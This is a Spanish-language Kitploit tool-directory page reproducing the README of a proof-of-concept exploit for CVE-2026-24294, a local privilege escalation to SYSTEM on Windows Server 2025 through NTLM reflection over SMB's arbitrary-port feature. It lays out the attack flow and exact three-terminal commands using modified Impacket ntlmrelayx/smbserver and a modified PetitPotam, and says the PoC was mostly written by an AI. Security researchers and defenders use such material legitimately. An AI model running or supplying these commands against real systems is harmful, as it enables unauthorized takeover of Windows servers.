Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24294 — PoC de escalada de privilegios local para CVE-2026-24294, que abusa del puerto arbitrario de SMB y la reflexión NTLM para obtener SYSTEM en Windows Server 2025. | Kitploit
Herramientas/GitHubGitHub/0xndi/cve-2026-24294
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónMovimiento LateralPruebas de PenetraciónRed Teaming
GitHub0xndi/cve-2026-24294

CVE-2026-24294

PoC de escalada de privilegios local para CVE-2026-24294, que abusa del puerto arbitrario de SMB y la reflexión NTLM para obtener SYSTEM en Windows Server 2025.

Ver Repositorio
536hace 3 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-24294 - Escalada de Privilegios Local (LPE) por Reflexión NTLM vía Puerto Arbitrario SMB

Escalada de privilegios local en Windows Server 2025 mediante reflexión NTLM, abusando de la función de puerto arbitrario SMB introducida en Windows 11 24H2 / Server 2025.

Vulnerabilidad

Windows 11 24H2 / Server 2025 introdujo una función del cliente SMB que permite conexiones en puertos TCP arbitrarios (net use \\host\share /tcpport:PORT). Combinado con la multiplexación de sesiones SMB (MS-SMB2 Sección 3.2.4.2), esto permite la reflexión NTLM local: un usuario con bajos privilegios puede coaccionar a un servicio privilegiado (LSASS) para que se autentique contra un servidor SMB controlado por el atacante en un puerto no estándar, y luego retransmitir la autenticación NTLM capturada de vuelta al servicio SMB real en el puerto 445.

Impacto: NT AUTHORITY\SYSTEM desde cualquier usuario local.

Afectados: Windows Server 2025 (configuración predeterminada). Windows 11 24H2 aplica la firma SMB, bloqueando la retransmisión.

Flujo del Ataque

root@kitploit:~
 LSASS (SYSTEM) ──NTLM──► Cliente SMB ──TCP:12345──► smbserver.py (nuestro)
                                                   │
                                                   ▼ retransmite blob NTLM
 Servicio SMB (:445) ◄────────────────── ntlmrelayx.py
 ← sesión SYSTEM
  1. net use abre una conexión TCP a nuestro servidor SMB en un puerto personalizado
  2. PetitPotam coacciona a LSASS para que se autentique contra \\127.0.0.1\share
  3. El cliente SMB reutiliza la conexión TCP existente (multiplexación de sesiones)
  4. Nuestro smbserver captura el blob NTLM privilegiado y lo retransmite vía ntlmrelayx
  5. ntlmrelayx se autentica contra el servicio SMB real en el puerto 445 como SYSTEM

Requisitos

  • Objetivo Windows Server 2025
  • Python 3 con Impacket
  • PetitPotam.exe (compilar desde el código fuente con Visual Studio, ver PetitPotam/)

Uso

Abra 3 terminales.

Terminal 1 — Inicie ntlmrelayx (escucha en el puerto RAW 6666, retransmite a SMB localhost):

root@kitploit:~
python ntlmrelayx.py --no-smb-server --no-http-server --no-wcf-server --no-winrm-server --no-rpc-server --no-mssql-server --no-rdp-server -t smb://127.0.0.1 -c "whoami" -smb2support --raw-port 6666

Terminal 2 — Inicie el smbserver modificado (escucha en el puerto 12345, retransmite NTLM al puerto 6666):

root@kitploit:~
python smbserver.py test . -port 12345 -smb2support -username user -password user -relay-port 6666

Terminal 3 — Ejecute el exploit:

root@kitploit:~
:: Montar recurso compartido en puerto personalizado (abre conexión TCP persistente)
net use \\127.0.0.1\test /tcpport:12345 /user:user user

:: Coaccionar a LSASS para que se autentique contra nuestro servidor SMB
PetitPotam.exe 127.0.0.1 localhost 2

La salida de whoami de ntlmrelayx mostrará NT AUTHORITY\SYSTEM.

Componentes

  • PetitPotam/ — Código fuente de PetitPotam modificado. Dos cambios respecto al original:
    • UUID: df1941c5-fe89-4e79-bf10-463657acf44d (interfaz EFSRPC de WS2025)
    • Tubería con nombre: \pipe\efsrpc
    • Usa la API #2 (EfsRpcEncryptFileSrv), nombre del recurso compartido fijado como test
  • smbserver.py — smbserver de impacket modificado con la bandera -relay-port. Intercepta SMB2 SESSION_SETUP para capturar una segunda autenticación NTLM en una conexión multiplexada y retransmitirla a un servidor de retransmisión RAW (ntlmrelayx --raw-port).

Créditos

Este PoC fue escrito principalmente por IA (GLM 5.1) basándose en la investigación y las técnicas descritas en:

  • Bypassing Windows Authentication Reflection Mitigations for System Shells — Guillaume André, Synacktiv

Referencias

  • CVE-2026-24294 — Microsoft Security Response Center
  • PetitPotam — Gilles Lionel
  • Impacket — Fortra
Descargar herramienta